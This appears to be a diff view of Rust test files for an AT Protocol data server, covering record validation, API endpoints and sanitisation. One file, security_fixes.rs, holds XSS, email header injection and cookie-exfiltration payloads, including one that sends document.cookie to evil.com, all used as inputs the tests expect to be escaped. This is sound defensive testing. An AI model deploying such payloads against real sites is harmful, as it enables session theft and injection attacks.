512
+
513
#[test]
514
fn test_validate_record_key_at_max_length() {
515
let max_key = "k".repeat(512);
516
assert!(validate_record_key(&max_key).is_ok());
517
}
518
+
519
#[test]
520
fn test_validate_collection_nsid_valid() {
521
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
523
assert!(validate_collection_nsid("a.b.c").is_ok());
524
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
525
}
526
+
527
#[test]
528
fn test_validate_collection_nsid_empty() {
529
let result = validate_collection_nsid("");
530
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
531
}
532
+
533
#[test]
534
fn test_validate_collection_nsid_too_few_segments() {
535
assert!(validate_collection_nsid("a").is_err());
536
assert!(validate_collection_nsid("a.b").is_err());
537
}
538
+
539
#[test]
540
fn test_validate_collection_nsid_empty_segment() {
541
assert!(validate_collection_nsid("a..b.c").is_err());
542
assert!(validate_collection_nsid(".a.b.c").is_err());
543
assert!(validate_collection_nsid("a.b.c.").is_err());
544
}
545
+
546
#[test]
547
fn test_validate_collection_nsid_invalid_chars() {
548
assert!(validate_collection_nsid("a.b.c/d").is_err());
549
assert!(validate_collection_nsid("a.b.c_d").is_err());
550
assert!(validate_collection_nsid("a.b.c@d").is_err());
551
}
552
+
553
#[test]
554
fn test_validate_threadgate() {
555
let validator = RecordValidator::new();
···
561
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
562
assert_eq!(result.unwrap(), ValidationStatus::Valid);
563
}
564
+
565
#[test]
566
fn test_validate_labeler_service() {
567
let validator = RecordValidator::new();
···
575
let result = validator.validate(&labeler, "app.bsky.labeler.service");
576
assert_eq!(result.unwrap(), ValidationStatus::Valid);
577
}
578
+
579
#[test]
580
fn test_validate_list_item() {
581
let validator = RecordValidator::new();
+6
tests/repo_batch.rs
+6
tests/repo_batch.rs
···
3
use chrono::Utc;
4
use reqwest::StatusCode;
5
use serde_json::{Value, json};
6
#[tokio::test]
7
async fn test_apply_writes_create() {
8
let client = client();
···
50
assert!(results[0]["uri"].is_string());
51
assert!(results[0]["cid"].is_string());
52
}
53
#[tokio::test]
54
async fn test_apply_writes_update() {
55
let client = client();
···
108
assert_eq!(results.len(), 1);
109
assert!(results[0]["uri"].is_string());
110
}
111
#[tokio::test]
112
async fn test_apply_writes_delete() {
113
let client = client();
···
171
.expect("Failed to verify");
172
assert_eq!(get_res.status(), StatusCode::NOT_FOUND);
173
}
174
#[tokio::test]
175
async fn test_apply_writes_mixed_operations() {
176
let client = client();
···
258
let results = body["results"].as_array().unwrap();
259
assert_eq!(results.len(), 3);
260
}
261
#[tokio::test]
262
async fn test_apply_writes_no_auth() {
263
let client = client();
···
286
.expect("Failed to send request");
287
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
288
}
289
#[tokio::test]
290
async fn test_apply_writes_empty_writes() {
291
let client = client();
···
3
use chrono::Utc;
4
use reqwest::StatusCode;
5
use serde_json::{Value, json};
6
+
7
#[tokio::test]
8
async fn test_apply_writes_create() {
9
let client = client();
···
51
assert!(results[0]["uri"].is_string());
52
assert!(results[0]["cid"].is_string());
53
}
54
+
55
#[tokio::test]
56
async fn test_apply_writes_update() {
57
let client = client();
···
110
assert_eq!(results.len(), 1);
111
assert!(results[0]["uri"].is_string());
112
}
113
+
114
#[tokio::test]
115
async fn test_apply_writes_delete() {
116
let client = client();
···
174
.expect("Failed to verify");
175
assert_eq!(get_res.status(), StatusCode::NOT_FOUND);
176
}
177
+
178
#[tokio::test]
179
async fn test_apply_writes_mixed_operations() {
180
let client = client();
···
262
let results = body["results"].as_array().unwrap();
263
assert_eq!(results.len(), 3);
264
}
265
+
266
#[tokio::test]
267
async fn test_apply_writes_no_auth() {
268
let client = client();
···
291
.expect("Failed to send request");
292
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
293
}
294
+
295
#[tokio::test]
296
async fn test_apply_writes_empty_writes() {
297
let client = client();
+6
tests/repo_blob.rs
+6
tests/repo_blob.rs
···
2
use common::*;
3
use reqwest::{StatusCode, header};
4
use serde_json::Value;
5
#[tokio::test]
6
async fn test_upload_blob_no_auth() {
7
let client = client();
···
19
let body: Value = res.json().await.expect("Response was not valid JSON");
20
assert_eq!(body["error"], "AuthenticationRequired");
21
}
22
#[tokio::test]
23
async fn test_upload_blob_success() {
24
let client = client();
···
38
let body: Value = res.json().await.expect("Response was not valid JSON");
39
assert!(body["blob"]["ref"]["$link"].as_str().is_some());
40
}
41
#[tokio::test]
42
async fn test_upload_blob_bad_token() {
43
let client = client();
···
56
let body: Value = res.json().await.expect("Response was not valid JSON");
57
assert_eq!(body["error"], "AuthenticationFailed");
58
}
59
#[tokio::test]
60
async fn test_upload_blob_unsupported_mime_type() {
61
let client = client();
···
73
.expect("Failed to send request");
74
assert_eq!(res.status(), StatusCode::OK);
75
}
76
#[tokio::test]
77
async fn test_list_missing_blobs() {
78
let client = client();
···
90
let body: Value = res.json().await.expect("Response was not valid JSON");
91
assert!(body["blobs"].is_array());
92
}
93
#[tokio::test]
94
async fn test_list_missing_blobs_no_auth() {
95
let client = client();
···
2
use common::*;
3
use reqwest::{StatusCode, header};
4
use serde_json::Value;
5
+
6
#[tokio::test]
7
async fn test_upload_blob_no_auth() {
8
let client = client();
···
20
let body: Value = res.json().await.expect("Response was not valid JSON");
21
assert_eq!(body["error"], "AuthenticationRequired");
22
}
23
+
24
#[tokio::test]
25
async fn test_upload_blob_success() {
26
let client = client();
···
40
let body: Value = res.json().await.expect("Response was not valid JSON");
41
assert!(body["blob"]["ref"]["$link"].as_str().is_some());
42
}
43
+
44
#[tokio::test]
45
async fn test_upload_blob_bad_token() {
46
let client = client();
···
59
let body: Value = res.json().await.expect("Response was not valid JSON");
60
assert_eq!(body["error"], "AuthenticationFailed");
61
}
62
+
63
#[tokio::test]
64
async fn test_upload_blob_unsupported_mime_type() {
65
let client = client();
···
77
.expect("Failed to send request");
78
assert_eq!(res.status(), StatusCode::OK);
79
}
80
+
81
#[tokio::test]
82
async fn test_list_missing_blobs() {
83
let client = client();
···
95
let body: Value = res.json().await.expect("Response was not valid JSON");
96
assert!(body["blobs"].is_array());
97
}
98
+
99
#[tokio::test]
100
async fn test_list_missing_blobs_no_auth() {
101
let client = client();
+39
tests/security_fixes.rs
+39
tests/security_fixes.rs
···
4
};
5
use bspds::oauth::templates::{login_page, error_page, success_page};
6
use bspds::image::{ImageProcessor, ImageError};
7
#[test]
8
fn test_sanitize_header_value_removes_crlf() {
9
let malicious = "Injected\r\nBcc: attacker@evil.com";
···
13
assert!(sanitized.contains("Injected"), "Original content should be preserved");
14
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
15
}
16
#[test]
17
fn test_sanitize_header_value_preserves_content() {
18
let normal = "Normal Subject Line";
19
let sanitized = sanitize_header_value(normal);
20
assert_eq!(sanitized, "Normal Subject Line");
21
}
22
#[test]
23
fn test_sanitize_header_value_trims_whitespace() {
24
let padded = " Subject ";
25
let sanitized = sanitize_header_value(padded);
26
assert_eq!(sanitized, "Subject");
27
}
28
#[test]
29
fn test_sanitize_header_value_handles_multiple_newlines() {
30
let input = "Line1\r\nLine2\nLine3\rLine4";
···
34
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
35
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
36
}
37
#[test]
38
fn test_email_header_injection_sanitization() {
39
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
···
44
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
45
assert!(sanitized.contains("X-Injected:"), "All content on same line");
46
}
47
#[test]
48
fn test_valid_phone_number_accepts_correct_format() {
49
assert!(is_valid_phone_number("+1234567890"));
···
52
assert!(is_valid_phone_number("+4915123456789"));
53
assert!(is_valid_phone_number("+1"));
54
}
55
#[test]
56
fn test_valid_phone_number_rejects_missing_plus() {
57
assert!(!is_valid_phone_number("1234567890"));
58
assert!(!is_valid_phone_number("12025551234"));
59
}
60
#[test]
61
fn test_valid_phone_number_rejects_empty() {
62
assert!(!is_valid_phone_number(""));
63
}
64
#[test]
65
fn test_valid_phone_number_rejects_just_plus() {
66
assert!(!is_valid_phone_number("+"));
67
}
68
#[test]
69
fn test_valid_phone_number_rejects_too_long() {
70
assert!(!is_valid_phone_number("+12345678901234567890123"));
71
}
72
#[test]
73
fn test_valid_phone_number_rejects_letters() {
74
assert!(!is_valid_phone_number("+abc123"));
75
assert!(!is_valid_phone_number("+1234abc"));
76
assert!(!is_valid_phone_number("+a"));
77
}
78
#[test]
79
fn test_valid_phone_number_rejects_spaces() {
80
assert!(!is_valid_phone_number("+1234 5678"));
81
assert!(!is_valid_phone_number("+ 1234567890"));
82
assert!(!is_valid_phone_number("+1 "));
83
}
84
#[test]
85
fn test_valid_phone_number_rejects_special_chars() {
86
assert!(!is_valid_phone_number("+123-456-7890"));
87
assert!(!is_valid_phone_number("+1(234)567890"));
88
assert!(!is_valid_phone_number("+1.234.567.890"));
89
}
90
#[test]
91
fn test_signal_recipient_command_injection_blocked() {
92
let malicious_inputs = vec![
···
103
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
104
}
105
}
106
#[test]
107
fn test_image_file_size_limit_enforced() {
108
let processor = ImageProcessor::new();
···
119
Ok(_) => panic!("Should reject files over size limit"),
120
}
121
}
122
#[test]
123
fn test_image_file_size_limit_configurable() {
124
let processor = ImageProcessor::new().with_max_file_size(1024);
···
126
let result = processor.process(&data, "image/jpeg");
127
assert!(result.is_err(), "Should reject files over configured limit");
128
}
129
#[test]
130
fn test_oauth_template_xss_escaping_client_id() {
131
let malicious_client_id = "<script>alert('xss')</script>";
···
133
assert!(!html.contains("<script>"), "Script tags should be escaped");
134
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
135
}
136
#[test]
137
fn test_oauth_template_xss_escaping_client_name() {
138
let malicious_client_name = "<img src=x onerror=alert('xss')>";
···
140
assert!(!html.contains("<img "), "IMG tags should be escaped");
141
assert!(html.contains("<img"), "IMG tag should be escaped as HTML entity");
142
}
143
#[test]
144
fn test_oauth_template_xss_escaping_scope() {
145
let malicious_scope = "\"><script>alert('xss')</script>";
146
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
147
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
148
}
149
#[test]
150
fn test_oauth_template_xss_escaping_error_message() {
151
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
152
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
153
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
154
}
155
#[test]
156
fn test_oauth_template_xss_escaping_login_hint() {
157
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
···
159
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
160
assert!(html.contains("""), "Quotes should be escaped");
161
}
162
#[test]
163
fn test_oauth_template_xss_escaping_request_uri() {
164
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
165
let html = login_page("client123", None, None, malicious_uri, None, None);
166
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
167
}
168
#[test]
169
fn test_oauth_error_page_xss_escaping() {
170
let malicious_error = "<script>steal()</script>";
···
173
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
174
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
175
}
176
#[test]
177
fn test_oauth_success_page_xss_escaping() {
178
let malicious_name = "<script>steal_session()</script>";
179
let html = success_page(Some(malicious_name));
180
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
181
}
182
#[test]
183
fn test_oauth_template_no_javascript_urls() {
184
let html = login_page("client123", None, None, "test-uri", None, None);
···
188
let success_html = success_page(None);
189
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
190
}
191
#[test]
192
fn test_oauth_template_form_action_safe() {
193
let malicious_uri = "javascript:alert('xss')//";
194
let html = login_page("client123", None, None, malicious_uri, None, None);
195
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
196
}
197
#[test]
198
fn test_send_error_types_have_display() {
199
let timeout = SendError::Timeout;
···
203
assert!(!format!("{}", max_retries).is_empty());
204
assert!(!format!("{}", invalid_recipient).is_empty());
205
}
206
#[test]
207
fn test_send_error_timeout_message() {
208
let error = SendError::Timeout;
209
let msg = format!("{}", error);
210
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
211
}
212
#[test]
213
fn test_send_error_max_retries_includes_detail() {
214
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
215
let msg = format!("{}", error);
216
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
217
}
218
#[tokio::test]
219
async fn test_check_signup_queue_accepts_session_jwt() {
220
use common::{base_url, client, create_account_and_login};
···
231
let body: serde_json::Value = res.json().await.unwrap();
232
assert_eq!(body["activated"], true);
233
}
234
#[tokio::test]
235
async fn test_check_signup_queue_no_auth() {
236
use common::{base_url, client};
···
245
let body: serde_json::Value = res.json().await.unwrap();
246
assert_eq!(body["activated"], true);
247
}
248
#[test]
249
fn test_html_escape_ampersand() {
250
let html = login_page("client&test", None, None, "test-uri", None, None);
251
assert!(html.contains("&"), "Ampersand should be escaped");
252
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
253
}
254
#[test]
255
fn test_html_escape_quotes() {
256
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
257
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
258
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
259
}
260
#[test]
261
fn test_html_escape_angle_brackets() {
262
let html = login_page("client<test>more", None, None, "test-uri", None, None);
···
264
assert!(html.contains(">"), "Greater than should be escaped");
265
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
266
}
267
#[test]
268
fn test_oauth_template_preserves_safe_content() {
269
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
···
271
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
272
assert!(html.contains("user@example.com"), "Login hint should be preserved");
273
}
274
#[test]
275
fn test_csrf_like_input_value_protection() {
276
let malicious = "\" onclick=\"alert('csrf')";
277
let html = login_page("client", None, None, malicious, None, None);
278
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
279
}
280
#[test]
281
fn test_unicode_handling_in_templates() {
282
let unicode_client = "客户端 クライアント";
283
let html = login_page(unicode_client, None, None, "test-uri", None, None);
284
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
285
}
286
#[test]
287
fn test_null_byte_in_input() {
288
let with_null = "client\0id";
289
let sanitized = sanitize_header_value(with_null);
290
assert!(sanitized.contains("client"), "Content before null should be preserved");
291
}
292
#[test]
293
fn test_very_long_input_handling() {
294
let long_input = "x".repeat(10000);
···
4
};
5
use bspds::oauth::templates::{login_page, error_page, success_page};
6
use bspds::image::{ImageProcessor, ImageError};
7
+
8
#[test]
9
fn test_sanitize_header_value_removes_crlf() {
10
let malicious = "Injected\r\nBcc: attacker@evil.com";
···
14
assert!(sanitized.contains("Injected"), "Original content should be preserved");
15
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
16
}
17
+
18
#[test]
19
fn test_sanitize_header_value_preserves_content() {
20
let normal = "Normal Subject Line";
21
let sanitized = sanitize_header_value(normal);
22
assert_eq!(sanitized, "Normal Subject Line");
23
}
24
+
25
#[test]
26
fn test_sanitize_header_value_trims_whitespace() {
27
let padded = " Subject ";
28
let sanitized = sanitize_header_value(padded);
29
assert_eq!(sanitized, "Subject");
30
}
31
+
32
#[test]
33
fn test_sanitize_header_value_handles_multiple_newlines() {
34
let input = "Line1\r\nLine2\nLine3\rLine4";
···
38
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
39
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
40
}
41
+
42
#[test]
43
fn test_email_header_injection_sanitization() {
44
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
···
49
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
50
assert!(sanitized.contains("X-Injected:"), "All content on same line");
51
}
52
+
53
#[test]
54
fn test_valid_phone_number_accepts_correct_format() {
55
assert!(is_valid_phone_number("+1234567890"));
···
58
assert!(is_valid_phone_number("+4915123456789"));
59
assert!(is_valid_phone_number("+1"));
60
}
61
+
62
#[test]
63
fn test_valid_phone_number_rejects_missing_plus() {
64
assert!(!is_valid_phone_number("1234567890"));
65
assert!(!is_valid_phone_number("12025551234"));
66
}
67
+
68
#[test]
69
fn test_valid_phone_number_rejects_empty() {
70
assert!(!is_valid_phone_number(""));
71
}
72
+
73
#[test]
74
fn test_valid_phone_number_rejects_just_plus() {
75
assert!(!is_valid_phone_number("+"));
76
}
77
+
78
#[test]
79
fn test_valid_phone_number_rejects_too_long() {
80
assert!(!is_valid_phone_number("+12345678901234567890123"));
81
}
82
+
83
#[test]
84
fn test_valid_phone_number_rejects_letters() {
85
assert!(!is_valid_phone_number("+abc123"));
86
assert!(!is_valid_phone_number("+1234abc"));
87
assert!(!is_valid_phone_number("+a"));
88
}
89
+
90
#[test]
91
fn test_valid_phone_number_rejects_spaces() {
92
assert!(!is_valid_phone_number("+1234 5678"));
93
assert!(!is_valid_phone_number("+ 1234567890"));
94
assert!(!is_valid_phone_number("+1 "));
95
}
96
+
97
#[test]
98
fn test_valid_phone_number_rejects_special_chars() {
99
assert!(!is_valid_phone_number("+123-456-7890"));
100
assert!(!is_valid_phone_number("+1(234)567890"));
101
assert!(!is_valid_phone_number("+1.234.567.890"));
102
}
103
+
104
#[test]
105
fn test_signal_recipient_command_injection_blocked() {
106
let malicious_inputs = vec![
···
117
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
118
}
119
}
120
+
121
#[test]
122
fn test_image_file_size_limit_enforced() {
123
let processor = ImageProcessor::new();
···
134
Ok(_) => panic!("Should reject files over size limit"),
135
}
136
}
137
+
138
#[test]
139
fn test_image_file_size_limit_configurable() {
140
let processor = ImageProcessor::new().with_max_file_size(1024);
···
142
let result = processor.process(&data, "image/jpeg");
143
assert!(result.is_err(), "Should reject files over configured limit");
144
}
145
+
146
#[test]
147
fn test_oauth_template_xss_escaping_client_id() {
148
let malicious_client_id = "<script>alert('xss')</script>";
···
150
assert!(!html.contains("<script>"), "Script tags should be escaped");
151
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
152
}
153
+
154
#[test]
155
fn test_oauth_template_xss_escaping_client_name() {
156
let malicious_client_name = "<img src=x onerror=alert('xss')>";
···
158
assert!(!html.contains("<img "), "IMG tags should be escaped");
159
assert!(html.contains("<img"), "IMG tag should be escaped as HTML entity");
160
}
161
+
162
#[test]
163
fn test_oauth_template_xss_escaping_scope() {
164
let malicious_scope = "\"><script>alert('xss')</script>";
165
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
166
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
167
}
168
+
169
#[test]
170
fn test_oauth_template_xss_escaping_error_message() {
171
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
172
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
173
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
174
}
175
+
176
#[test]
177
fn test_oauth_template_xss_escaping_login_hint() {
178
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
···
180
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
181
assert!(html.contains("""), "Quotes should be escaped");
182
}
183
+
184
#[test]
185
fn test_oauth_template_xss_escaping_request_uri() {
186
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
187
let html = login_page("client123", None, None, malicious_uri, None, None);
188
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
189
}
190
+
191
#[test]
192
fn test_oauth_error_page_xss_escaping() {
193
let malicious_error = "<script>steal()</script>";
···
196
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
197
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
198
}
199
+
200
#[test]
201
fn test_oauth_success_page_xss_escaping() {
202
let malicious_name = "<script>steal_session()</script>";
203
let html = success_page(Some(malicious_name));
204
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
205
}
206
+
207
#[test]
208
fn test_oauth_template_no_javascript_urls() {
209
let html = login_page("client123", None, None, "test-uri", None, None);
···
213
let success_html = success_page(None);
214
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
215
}
216
+
217
#[test]
218
fn test_oauth_template_form_action_safe() {
219
let malicious_uri = "javascript:alert('xss')//";
220
let html = login_page("client123", None, None, malicious_uri, None, None);
221
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
222
}
223
+
224
#[test]
225
fn test_send_error_types_have_display() {
226
let timeout = SendError::Timeout;
···
230
assert!(!format!("{}", max_retries).is_empty());
231
assert!(!format!("{}", invalid_recipient).is_empty());
232
}
233
+
234
#[test]
235
fn test_send_error_timeout_message() {
236
let error = SendError::Timeout;
237
let msg = format!("{}", error);
238
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
239
}
240
+
241
#[test]
242
fn test_send_error_max_retries_includes_detail() {
243
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
244
let msg = format!("{}", error);
245
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
246
}
247
+
248
#[tokio::test]
249
async fn test_check_signup_queue_accepts_session_jwt() {
250
use common::{base_url, client, create_account_and_login};
···
261
let body: serde_json::Value = res.json().await.unwrap();
262
assert_eq!(body["activated"], true);
263
}
264
+
265
#[tokio::test]
266
async fn test_check_signup_queue_no_auth() {
267
use common::{base_url, client};
···
276
let body: serde_json::Value = res.json().await.unwrap();
277
assert_eq!(body["activated"], true);
278
}
279
+
280
#[test]
281
fn test_html_escape_ampersand() {
282
let html = login_page("client&test", None, None, "test-uri", None, None);
283
assert!(html.contains("&"), "Ampersand should be escaped");
284
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
285
}
286
+
287
#[test]
288
fn test_html_escape_quotes() {
289
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
290
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
291
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
292
}
293
+
294
#[test]
295
fn test_html_escape_angle_brackets() {
296
let html = login_page("client<test>more", None, None, "test-uri", None, None);
···
298
assert!(html.contains(">"), "Greater than should be escaped");
299
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
300
}
301
+
302
#[test]
303
fn test_oauth_template_preserves_safe_content() {
304
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
···
306
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
307
assert!(html.contains("user@example.com"), "Login hint should be preserved");
308
}
309
+
310
#[test]
311
fn test_csrf_like_input_value_protection() {
312
let malicious = "\" onclick=\"alert('csrf')";
313
let html = login_page("client", None, None, malicious, None, None);
314
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
315
}
316
+
317
#[test]
318
fn test_unicode_handling_in_templates() {
319
let unicode_client = "客户端 クライアント";
320
let html = login_page(unicode_client, None, None, "test-uri", None, None);
321
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
322
}
323
+
324
#[test]
325
fn test_null_byte_in_input() {
326
let with_null = "client\0id";
327
let sanitized = sanitize_header_value(with_null);
328
assert!(sanitized.contains("client"), "Content before null should be preserved");
329
}
330
+
331
#[test]
332
fn test_very_long_input_handling() {
333
let long_input = "x".repeat(10000);
+17
tests/server.rs
+17
tests/server.rs
···
4
use helpers::verify_new_account;
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
#[tokio::test]
8
async fn test_health() {
9
let client = client();
···
15
assert_eq!(res.status(), StatusCode::OK);
16
assert_eq!(res.text().await.unwrap(), "OK");
17
}
18
#[tokio::test]
19
async fn test_describe_server() {
20
let client = client();
···
30
let body: Value = res.json().await.expect("Response was not valid JSON");
31
assert!(body.get("availableUserDomains").is_some());
32
}
33
#[tokio::test]
34
async fn test_create_session() {
35
let client = client();
···
69
let body: Value = res.json().await.expect("Response was not valid JSON");
70
assert!(body.get("accessJwt").is_some());
71
}
72
#[tokio::test]
73
async fn test_create_session_missing_identifier() {
74
let client = client();
···
90
res.status()
91
);
92
}
93
#[tokio::test]
94
async fn test_create_account_invalid_handle() {
95
let client = client();
···
113
"Expected 400 for invalid handle chars"
114
);
115
}
116
#[tokio::test]
117
async fn test_get_session() {
118
let client = client();
···
127
.expect("Failed to send request");
128
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
129
}
130
#[tokio::test]
131
async fn test_refresh_session() {
132
let client = client();
···
188
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
189
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
190
}
191
#[tokio::test]
192
async fn test_delete_session() {
193
let client = client();
···
202
.expect("Failed to send request");
203
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
204
}
205
#[tokio::test]
206
async fn test_get_service_auth_success() {
207
let client = client();
···
230
assert_eq!(claims["sub"], did);
231
assert_eq!(claims["aud"], "did:web:example.com");
232
}
233
#[tokio::test]
234
async fn test_get_service_auth_with_lxm() {
235
let client = client();
···
255
assert_eq!(claims["iss"], did);
256
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
257
}
258
#[tokio::test]
259
async fn test_get_service_auth_no_auth() {
260
let client = client();
···
272
let body: Value = res.json().await.expect("Response was not valid JSON");
273
assert_eq!(body["error"], "AuthenticationRequired");
274
}
275
#[tokio::test]
276
async fn test_get_service_auth_missing_aud() {
277
let client = client();
···
287
.expect("Failed to send request");
288
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
289
}
290
#[tokio::test]
291
async fn test_check_account_status_success() {
292
let client = client();
···
308
assert!(body["repoRev"].is_string());
309
assert!(body["indexedRecords"].is_number());
310
}
311
#[tokio::test]
312
async fn test_check_account_status_no_auth() {
313
let client = client();
···
323
let body: Value = res.json().await.expect("Response was not valid JSON");
324
assert_eq!(body["error"], "AuthenticationRequired");
325
}
326
#[tokio::test]
327
async fn test_activate_account_success() {
328
let client = client();
···
338
.expect("Failed to send request");
339
assert_eq!(res.status(), StatusCode::OK);
340
}
341
#[tokio::test]
342
async fn test_activate_account_no_auth() {
343
let client = client();
···
351
.expect("Failed to send request");
352
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
353
}
354
#[tokio::test]
355
async fn test_deactivate_account_success() {
356
let client = client();
···
4
use helpers::verify_new_account;
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
+
8
#[tokio::test]
9
async fn test_health() {
10
let client = client();
···
16
assert_eq!(res.status(), StatusCode::OK);
17
assert_eq!(res.text().await.unwrap(), "OK");
18
}
19
+
20
#[tokio::test]
21
async fn test_describe_server() {
22
let client = client();
···
32
let body: Value = res.json().await.expect("Response was not valid JSON");
33
assert!(body.get("availableUserDomains").is_some());
34
}
35
+
36
#[tokio::test]
37
async fn test_create_session() {
38
let client = client();
···
72
let body: Value = res.json().await.expect("Response was not valid JSON");
73
assert!(body.get("accessJwt").is_some());
74
}
75
+
76
#[tokio::test]
77
async fn test_create_session_missing_identifier() {
78
let client = client();
···
94
res.status()
95
);
96
}
97
+
98
#[tokio::test]
99
async fn test_create_account_invalid_handle() {
100
let client = client();
···
118
"Expected 400 for invalid handle chars"
119
);
120
}
121
+
122
#[tokio::test]
123
async fn test_get_session() {
124
let client = client();
···
133
.expect("Failed to send request");
134
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
135
}
136
+
137
#[tokio::test]
138
async fn test_refresh_session() {
139
let client = client();
···
195
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
196
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
197
}
198
+
199
#[tokio::test]
200
async fn test_delete_session() {
201
let client = client();
···
210
.expect("Failed to send request");
211
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
212
}
213
+
214
#[tokio::test]
215
async fn test_get_service_auth_success() {
216
let client = client();
···
239
assert_eq!(claims["sub"], did);
240
assert_eq!(claims["aud"], "did:web:example.com");
241
}
242
+
243
#[tokio::test]
244
async fn test_get_service_auth_with_lxm() {
245
let client = client();
···
265
assert_eq!(claims["iss"], did);
266
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
267
}
268
+
269
#[tokio::test]
270
async fn test_get_service_auth_no_auth() {
271
let client = client();
···
283
let body: Value = res.json().await.expect("Response was not valid JSON");
284
assert_eq!(body["error"], "AuthenticationRequired");
285
}
286
+
287
#[tokio::test]
288
async fn test_get_service_auth_missing_aud() {
289
let client = client();
···
299
.expect("Failed to send request");
300
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
301
}
302
+
303
#[tokio::test]
304
async fn test_check_account_status_success() {
305
let client = client();
···
321
assert!(body["repoRev"].is_string());
322
assert!(body["indexedRecords"].is_number());
323
}
324
+
325
#[tokio::test]
326
async fn test_check_account_status_no_auth() {
327
let client = client();
···
337
let body: Value = res.json().await.expect("Response was not valid JSON");
338
assert_eq!(body["error"], "AuthenticationRequired");
339
}
340
+
341
#[tokio::test]
342
async fn test_activate_account_success() {
343
let client = client();
···
353
.expect("Failed to send request");
354
assert_eq!(res.status(), StatusCode::OK);
355
}
356
+
357
#[tokio::test]
358
async fn test_activate_account_no_auth() {
359
let client = client();
···
367
.expect("Failed to send request");
368
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
369
}
370
+
371
